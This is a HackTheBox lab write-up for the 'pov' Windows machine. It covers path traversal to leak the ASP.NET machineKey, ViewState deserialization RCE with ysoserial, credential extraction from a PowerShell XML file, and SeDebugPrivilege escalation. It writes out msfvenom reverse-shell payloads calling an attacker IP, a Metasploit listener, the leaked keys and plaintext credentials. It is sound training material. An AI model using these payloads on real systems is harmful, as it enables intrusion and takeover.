HTB: pov Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐☆☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐⭐☆☆

Summary

pov is a Medium-difficulty Windows machine running IIS 10.0 on port 80. The exploitation path involves subdomain enumeration to discover dev.pov.htb, exploiting a path traversal vulnerability in the portfolio download feature to extract the ASP.NET machineKey, crafting a malicious ViewState payload using ysoserial.exe for remote code execution, discovering credentials via encrypted PowerShell XML files, and finally leveraging SeDebugPrivilege for privilege escalation to SYSTEM.

TL;DR: Subdomain enumeration → Path traversal (machineKey extraction) → ViewState deserialization RCE → Lateral movement (credential extraction) → SeDebugPrivilege escalation → SYSTEM.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.121.194

Results:

80/tcp  open  http  Microsoft IIS httpd 10.0

Service Enumeration

Hostname: pov.htb Subdomains: dev.pov.htb

echo "10.129.121.194 pov.htb dev.pov.htb" >> /etc/hosts

Subdomain Discovery

Use gobuster or ffuf to discover subdomains:

gobuster dns -d pov.htb -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-5000.txt

or

ffuf -w /path/to/wordlist -u "http://FUZZ.pov.htb" -H "Host: FUZZ.pov.htb"

This reveals dev.pov.htb, which hosts a portfolio application.

Directory Enumeration

Enumerate the dev.pov.htb subdomain:

feroxbuster -u http://dev.pov.htb -w /usr/share/wordlists/seclists/discovery/web-content/raft-large-words.txt

Key discovery: dev.pov.htb/portfolio with a “Download CV” feature.

Initial Foothold

Vulnerability: Path Traversal in Download Feature

The portfolio page at dev.pov.htb/portfolio contains a “Download CV” feature that accepts a POST request with a file parameter. This parameter is vulnerable to path traversal attacks.

Step 1: Identify the Vulnerability

Submit a POST request to the portfolio endpoint:

curl -X POST http://dev.pov.htb/portfolio/default.aspx -d "file=cv.pdf"

Step 2: Extract web.config via Path Traversal

Change the file parameter to traverse to the web.config file:

curl -X POST http://dev.pov.htb/portfolio/default.aspx -d "file=/web.config"

This reveals the ASP.NET web.config containing critical cryptographic keys:

Decryption Key:

74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43

Validation Key:

5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468

Encryption Algorithm: AES Validation Algorithm: SHA1

ViewState Deserialization RCE

Step 1: Generate Malicious ViewState

Using ysoserial.exe, craft a malicious ViewState payload with a PowerShell reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f psh-cmd -o revshell.ps1

Get the base64-encoded payload:

cat revshell.ps1 | base64 -w 0

Step 2: Generate ViewState Gadget Chain

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e <base64_revshell>" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

This generates a malicious ViewState string that will deserialize and execute the payload.

Step 3: Deliver the Payload

Intercept requests to the portfolio page using Burp Suite. Inject the malicious ViewState into the __VIEWSTATE parameter and submit. The ASP.NET runtime will deserialize the payload and execute the reverse shell command.

Result: Reverse shell as user sfitz on the target system.

User Compromise

Lateral Movement: Credential Extraction

As user sfitz, enumerate the file system to locate credentials:

dir Documents

Discover connection.xml in sfitz’s Documents folder. This file contains PowerShell encrypted credentials:

$Credential = Import-CliXml -Path C:\Users\sfitz\Documents\connection.xml
$Credential.GetNetworkCredential() | Format-List *

Extracted Credentials:

UserName : alaading
Password : f8gQ8fynP44ek1m3

Executing Commands as alaading

Use RunasCs.exe to obtain a shell or execute commands as the alaading user:

.\RunasCs.exe -u alaading -p "f8gQ8fynP44ek1m3" powershell.exe

Alternatively, use Invoke-Command from sfitz’s session:

$cred = New-Object System.Management.Automation.PSCredential("alaading", (ConvertTo-SecureString "f8gQ8fynP44ek1m3" -AsPlainText -Force))
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }

User Flag

cat C:\Users\alaading\Desktop\user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

As user alaading, check privileges:

whoami /priv

Key Finding: User alaading has SeDebugPrivilege, which allows the user to debug and manipulate other processes, including SYSTEM-level processes.

Exploitation Path 1: Meterpreter Migration to winlogon.exe

Step 1: Generate Meterpreter Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe -o meterpreter.exe

Step 2: Start Meterpreter Listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run

Step 3: Execute Meterpreter as alaading

Transfer meterpreter.exe to the target and execute it as alaading:

.\meterpreter.exe

Step 4: Migrate to winlogon.exe

In the Meterpreter session, identify the winlogon.exe process (which runs as SYSTEM):

ps

Migrate to that process:

migrate <winlogon_pid>

Result: Shell as nt authority\system.

Exploitation Path 2: SeDebugPrivilege with PowerShell Token Elevation

Alternatively, use EnableAllTokenPrivs.ps1 to enable SeDebugPrivilege:

. .\EnableAllTokenPrivs.ps1

Then create and execute a payload, followed by process migration to SYSTEM-level process (e.g., winlogon.exe).

Root Flag

cat C:\Windows\System32\config\root.txt

or

Get-Content C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance: nmap port 80, IIS 10.0"] --> B["Subdomain Enumeration: discover dev.pov.htb"]
    B --> C["Directory Enumeration: find /portfolio endpoint"]
    C --> D["Path Traversal: extract web.config and machineKey"]
    D --> E["ViewState RCE: craft malicious payload with ysoserial.exe"]
    E --> F["Initial Access: reverse shell as sfitz"]
    F --> G["Credential Extraction: decode connection.xml"]
    G --> H["Lateral Movement: execute as alaading user"]
    H --> I["Privilege Escalation: SeDebugPrivilege"]
    I --> J["Process Migration: winlogon.exe to SYSTEM"]
    J --> K["System Compromise: nt authority\system shell"]

Tools Used

Key Learnings

• Subdomain Enumeration: Always perform comprehensive subdomain enumeration; hidden subdomains often expose vulnerable applications not visible on the main domain.
• Path Traversal in Downloads: Download features that accept file parameters are prime targets for path traversal attacks; always test with directory traversal payloads.
• ASP.NET MachineKey Extraction: Compromised machineKey values allow attackers to forge ViewState tokens and achieve RCE through object deserialization gadget chains.
• PowerShell Credential Storage: Encrypted credentials stored in XML files can often be decrypted by the owning user; always search for connection.xml or similar files in user directories.
• SeDebugPrivilege Escalation: Users with SeDebugPrivilege can manipulate process tokens and migrate code execution to SYSTEM-level processes without requiring additional exploits.
• Defense in Depth: Combining multiple weak controls (path traversal + insecure deserialization + weak privilege separation) creates a complete compromise path.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Medium